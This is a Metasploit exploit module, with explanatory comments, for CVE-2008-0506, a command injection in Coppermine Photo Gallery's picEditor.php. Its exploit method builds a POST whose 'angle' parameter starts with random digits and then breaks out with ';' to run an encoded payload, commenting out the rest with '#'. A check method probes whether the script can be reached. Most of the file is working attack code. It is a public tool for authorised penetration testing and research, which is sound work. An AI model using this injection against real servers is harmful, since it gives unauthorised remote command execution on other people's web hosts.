Path: blob/master/modules/exploits/unix/webapp/coppermine_piceditor.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2008-0506 (see 'References' below): an OS command
# injection in Coppermine Photo Gallery's picEditor.php. Per the 'Description'
# the 'angle', 'quality' and 'clipval' POST parameters reach PHP's exec()
# without proper escaping when the (non-default) ImageMagick backend is in use.
# Only the 'angle' parameter is used by #exploit; 'quality' is sent with a
# benign value.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata (name, references, payload constraints, targets)
  # and the single 'URI' option pointing at the Coppermine install directory.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Coppermine Photo Gallery picEditor.php Command Execution',
      'Description'    => %q{
        This module exploits a vulnerability in the picEditor.php script of
        Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to
        use the ImageMagick library, the 'quality', 'angle', and 'clipval'
        parameters are not properly escaped before being passed to the PHP
        'exec' command.

        In order to reach the vulnerable 'exec' call, the input must pass
        several validation steps.

        The vulnerabilities actually reside in the following functions:

        image_processor.php: rotate_image(...)
        include/imageObjectIM.class.php: imageObject::cropImage(...)
        include/imageObjectIM.class.php: imageObject::rotateImage(...)
        include/imageObjectIM.class.php: imageObject::resizeImage(...)
        include/picmgmt.inc.php: resize_image(...)

        NOTE: Use of the ImageMagick library is a non-default option. However, a
        user can specify its use at installation time.
      },
      'Author'         =>
        [
          'Janek Vind', # original discovery/exploit
          'jduck' # metasploit version
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-0506' ],
          [ 'OSVDB', '41676' ],
          [ 'EDB', '5019' ],
          [ 'URL', 'http://forum.coppermine-gallery.net/index.php?topic=50103.0' ]
        ],
      'Privileged'     => true, # web server context
      'Payload'        =>
        {
          'DisableNops' => true,
          # A single quote is excluded because the application runs the input
          # through htmlentities before it reaches exec (see 'Description').
          'BadChars'    => '\'', # input gets passed to htmlentities
          'Space'       => 1024,
        },
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => '2008-01-30',
      'DefaultTarget'  => 0))

    register_options(
      [
        # Base path of the Coppermine install; picEditor.php is resolved beneath it.
        OptString.new('URI', [ true, "Coppermine directory path", "/cpg1414" ]),
      ])
  end

  # Presence check only: requests picEditor.php under datastore['URI'] and
  # reports Appears when the response body mentions "Coppermine Picture
  # Editor". It does not inspect the version or whether the ImageMagick
  # backend is enabled, so Appears means "the script is reachable", not
  # "confirmed vulnerable".
  #
  # @return [Exploit::CheckCode] Appears on a matching body, otherwise Safe
  def check
    # Second argument is the request timeout (seconds).
    res = send_request_raw({
      'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
    }, 25)

    if (res and res.body =~ /Coppermine Picture Editor/i)
      return Exploit::CheckCode::Appears
    end

    return Exploit::CheckCode::Safe
  end

  # Sends one POST to picEditor.php whose 'angle' parameter carries the
  # encoded payload, then starts the payload handler. A 200 response only
  # confirms the POST was accepted; the module does not verify that the
  # command actually executed.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when no response or a non-200 code is received
  def exploit
    # Filenames sent as 'newimage'. Presumably these are stock thumbnail images
    # shipped under images/ so the script's file checks pass — TODO confirm
    # against the Coppermine source named in 'Description'.
    valid_imgs = %w{thumb_audio.jpg thumb_avi.jpg thumb_doc.jpg thumb_document.jpg thumb_gz.jpg
      thumb_htm.jpg thumb_html.jpg thumb_mid.jpg thumb_midi.jpg thumb_mov.jpg thumb_movie.jpg
      thumb_mp3.jpg thumb_mpeg.jpg thumb_mpg.jpg thumb_nopic.jpg thumb_ogg.jpg thumb_pdf.jpg
      thumb_private.jpg thumb_qtv.jpg thumb_ra.jpg thumb_ram.jpg thumb_rar.jpg thumb_rm.jpg
      thumb_rmj.jpg thumb_swf.jpg thumb_txt.jpg thumb_wav.jpg thumb_wma.jpg thumb_wmv.jpg
      thumb_xls.jpg thumb_zip.jpg}
    # One random entry, referenced relative to the script's working directory.
    img = '../../images/' + valid_imgs[rand(valid_imgs.length)]
    # 'angle' begins with 1-8 random digits so it still looks numeric to the
    # validation steps mentioned in 'Description'; the rest is appended to the
    # shell command the application builds for ImageMagick's convert.
    # suppress errors from convert
    angle = rand_text_numeric(1+rand(8)) + ' -quiet 1 2'
    # and exec our cmd :)
    # The ';' ends convert's command line and '#' comments out whatever the
    # application appends afterwards — this is the unescaped exec() argument
    # the advisory describes. From a detection standpoint, an 'angle' value
    # containing ';' or '#' is never legitimate for this parameter.
    angle += ';' + payload.encoded + ';#'

    # Second argument is the request timeout (seconds).
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['URI'], "/picEditor.php"),
      'vars_post' =>
        {
          'angle' => angle,
          'quality' => '50', # not required, but fixes an error message
          'newimage' => img
        }
    }, 25)

    # No response (nil) and any non-200 status are both reported as Unknown;
    # the framework distinguishes neither connection failure nor app error here.
    if (res and res.code == 200)
      print_good("Successfully POST'd exploit data")
    else
      fail_with(Failure::Unknown, "Error POSTing exploit data")
    end

    # Start the framework's payload handler for the configured payload.
    handler
  end
end